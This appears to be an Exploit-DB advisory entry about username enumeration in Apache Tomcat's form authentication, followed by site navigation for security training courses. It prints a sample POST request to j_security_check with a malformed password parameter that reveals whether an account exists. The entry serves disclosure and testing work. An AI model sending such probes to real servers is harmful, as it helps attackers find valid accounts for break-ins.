Apache Tomcat - Form Authentication 'Username' Enumeration

EDB-ID:

9995

CVE:

N/A

EDB Verified:

Author:

D. Matscheko

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2009-11-09

Vulnerable App: 
Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%
Tags:
Advisory/Source: Link
Downloads Certifications Training Professional Services
Kali Linux OSCP Penetration Testing with Kali Linux (PWK) (PEN-200)
All new for 2020 		Penetration Testing
Kali NetHunter OSWP Offensive Security Wireless Attacks (WiFu) (PEN-210) Advanced Attack Simulation
Kali Linux Revealed Book OSEP Evasion Techniques and Breaching Defences (PEN-300)
All new for 2020 		Application Security Assessment
OSWE Advanced Web Attacks and Exploitation (AWAE) (WEB-300)
Updated for 2020
OSED Windows User Mode Exploit Development (EXP-301)
All new for 2021
OSEE
KLCP [Free] Kali Linux Revealed
Kali Linux Kali NetHunter Kali Linux Revealed Book
OSCP OSWP OSEP OSWE OSED OSEE KLCP
- Penetration Testing with Kali Linux (PWK) (PEN-200)
All new for 2020 Offensive Security Wireless Attacks (WiFu) (PEN-210) Evasion Techniques and Breaching Defences (PEN-300)
All new for 2020 Advanced Web Attacks and Exploitation (AWAE) (WEB-300)
Updated for 2020 Windows User Mode Exploit Development (EXP-301)
All new for 2021 [Free] Kali Linux Revealed
Penetration Testing Advanced Attack Simulation Application Security Assessment